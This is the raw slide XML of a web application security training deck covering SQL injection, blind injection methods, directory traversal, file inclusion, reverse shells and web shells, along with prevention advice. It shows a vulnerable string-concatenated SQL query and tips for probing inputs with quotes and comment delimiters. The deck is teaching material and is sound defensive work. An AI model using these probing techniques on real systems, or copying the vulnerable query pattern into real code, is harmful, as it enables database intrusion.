            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>E.g., eval, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, system, exec, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>passthru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>proc_open</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>escapeshellarg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>escapeshellcmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>() to ensure that user input can not be injected into shell commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> to “Off” if not needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Sanitise user inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Blacklist/whitelist certain characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51063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EC118A-1319-4F84-AB8E-A18E17EDD6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Any questions?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8A8A93F-AD6F-4F35-8982-9EC6753367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298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77CD7-B5AE-4A88-84B1-3FB191D4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SQL Injection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4776F-7F11-45B0-86A0-1883A9D6A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 SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>An SQL example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”SELECT * FROM Users WHERE user='" . $user . "'" and pass='" . $pass . “’”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>What will happen if the user put a quote as their password?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C10B8-4806-4706-BFB1-15682C132BC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314632" y="6354375"/>
            <a:ext cx="4060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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://owasp.org/www-community/attacks/SQL_Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54816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B2738-F845-4B77-88A8-3C3E1B86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can adversaries do with SQL Injection attacks?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507EE-523E-474E-8063-635E2D513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btnInknoeActivity">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B489BBC-3B34-41BD-BA49-4F3AC70C65A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3024077" y="2857500"/>
            <a:ext cx="2219546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3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84860-F1A8-4EBA-A7C6-FA91C17A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can adversaries do with SQL Injection attacks?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C9FFC-82DE-4EF9-9F37-5C2F67BAE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Read sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Modify data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Execute admin-level commands in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Execute shell command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Read files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225435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30B3D-C412-4CB4-A24F-944068B3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do we identify SQL Injection vulnerabilities?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159F4-9218-46C7-BF5C-D27C0F00A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Look for any inputs/parameters that might interact with the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Including HTTP headers and cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Enter quotes or semicolons as their value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Use comment delimiters in the end if needed (#, --, /**/)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Look for error messages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95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C044-BD35-4874-88E7-5D22961F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error messages can tell us</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>Database fingerprinting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ECC10-56EA-4DB6-A64E-BEC0D3508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Each DBMS has unique error messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Knowing the DBMS means the subsequent attack can be tailored specifically for that DBMS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>How do prevent this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Hide error messages from users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Will hiding error messages prevent SQL injection altogether?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Gambar 4" descr="Sebuah gambar berisi meja&#10;&#10;Deskripsi dibuat secara otomatis">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B40F1FF9-3F8C-4B0C-812E-4A3E16F37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69" y="3333463"/>
            <a:ext cx="3214147" cy="317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2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85BA-4AC4-4502-BD62-CB2C7DE7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Blind SQL Injection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CAFFB-9B71-433D-945E-06B2C5BBE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 type of SQL Injection attack that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>asks the database true or false questions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> and determines the answer based on the applications response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Union Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Boolean Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Time Delay Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Error-based Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Out of Band </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" err="1"/>
              <a:t>Explotation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Stored Procedure Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Woman covering eyes">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0320F132-F577-4B69-9F74-351E596D0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019" y="0"/>
            <a:ext cx="2601581" cy="173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1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-6220987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S" val="false"/>
  <p:tag name="INKNOEBUTTONMODEL" val="{&quot;ActivityType&quot;:3,&quot;OptionCount&quot;:4,&quot;WcOptionCount&quot;:10,&quot;HasMultipleSubmission&quot;:true,&quot;HasAutoStop&quot;:false,&quot;HasMinimizeMode&quot;:false,&quot;TimerValue&quot;:&quot;1:00&quot;,&quot;HasAutoStart&quot;:false,&quot;HasCorrectAnswers&quot;:false,&quot;McqAnswers&quot;:[],&quot;ActivityId&quot;:&quot;&quot;,&quot;IaMcqCompetition&quot;:false,&quot;IsAnonymous&quot;:false,&quot;AutoAdvance&quot;:false,&quot;IsCompetitionMode&quot;:false}"/>
  <p:tag name="ACTIVITYMODEL" val="{&quot;$type&quot;:&quot;ClassPoint2.Core.Model.Activity, ClassPoint2.Core&quot;,&quot;ActivityId&quot;:null,&quot;Name&quot;:&quot;WordCloud&quot;,&quot;ActivityType&quot;:2,&quot;Width&quot;:0.0,&quot;Height&quot;:0.0,&quot;Graphics&quot;:null,&quot;ActivityBase&quot;:{&quot;$type&quot;:&quot;ClassPoint2.Core.DTO.Activities.WordCloudActivity, ClassPoint2.Core&quot;,&quot;numOfSubmissionsAllowed&quot;:10,&quot;activityId&quot;:&quot;&quot;,&quot;activityType&quot;:&quot;Word Cloud&quot;,&quot;countdown&quot;:0,&quot;base64EncodedImage&quot;:null,&quot;activitySlideUrl&quot;:null,&quot;StartWithSlide&quot;:false,&quot;CanMinimize&quot;:false,&quot;CanCountDown&quot;:false},&quot;IsLocked&quot;:false,&quot;IsMappedFromCp1&quot;:true,&quot;IsQuizMode&quot;:false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1735</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>259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Courier New</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Tw Cen MT Condensed</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Integral</vt:lpstr>
      <vt:lpstr>Cyber Drill – Web Application Security</vt:lpstr>
      <vt:lpstr>Disclaimer</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>What can adversaries do with SQL Injection attacks?</vt:lpstr>
      <vt:lpstr>What can adversaries do with SQL Injection attacks?</vt:lpstr>
      <vt:lpstr>How do we identify SQL Injection vulnerabilities?</vt:lpstr>
      <vt:lpstr>What error messages can tell us Database fingerprinting</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Union Exploitation</vt:lpstr>
      <vt:lpstr>Boolean Exploitation</vt:lpstr>
      <vt:lpstr>Time-based SQL Injection</vt:lpstr>
      <vt:lpstr>How do we identify SQL Injection vulnerabilities?</vt:lpstr>
      <vt:lpstr>SQL Injection Prevention (1)</vt:lpstr>
      <vt:lpstr>SQL Injection Prevention (2)</vt:lpstr>
      <vt:lpstr>Directory Traversal Vulnerabilities</vt:lpstr>
      <vt:lpstr>Directory Traversal Vulnerabilities</vt:lpstr>
      <vt:lpstr>How it works</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Tools: directory listing</vt:lpstr>
      <vt:lpstr>example</vt:lpstr>
      <vt:lpstr>Identifying Directory Traversal Vulnerabilities?</vt:lpstr>
      <vt:lpstr>File Inclusion Vulnerabilities</vt:lpstr>
      <vt:lpstr>Manual lfi</vt:lpstr>
      <vt:lpstr>Tools: Lfi-space</vt:lpstr>
      <vt:lpstr>Code analysis</vt:lpstr>
      <vt:lpstr>How do we execute code that does not exist?</vt:lpstr>
      <vt:lpstr>Log poisoning</vt:lpstr>
      <vt:lpstr>Remote File Inclusion</vt:lpstr>
      <vt:lpstr>Manual Remote File Inclusion</vt:lpstr>
      <vt:lpstr>Rfi &amp; Reverse shell </vt:lpstr>
      <vt:lpstr>Rfi &amp; Reverse shell </vt:lpstr>
      <vt:lpstr>Web Shells</vt:lpstr>
      <vt:lpstr>C99 Shell</vt:lpstr>
      <vt:lpstr>Web shell</vt:lpstr>
      <vt:lpstr>File Inclusion Vulnerabilities Prevention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</dc:title>
  <dc:creator>Didit Prasetyo</dc:creator>
  <cp:lastModifiedBy>Hudan Studiawan</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-26T02:22:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-14T06:48:43Z</dcterms:modified>
</cp:coreProperties>
</file>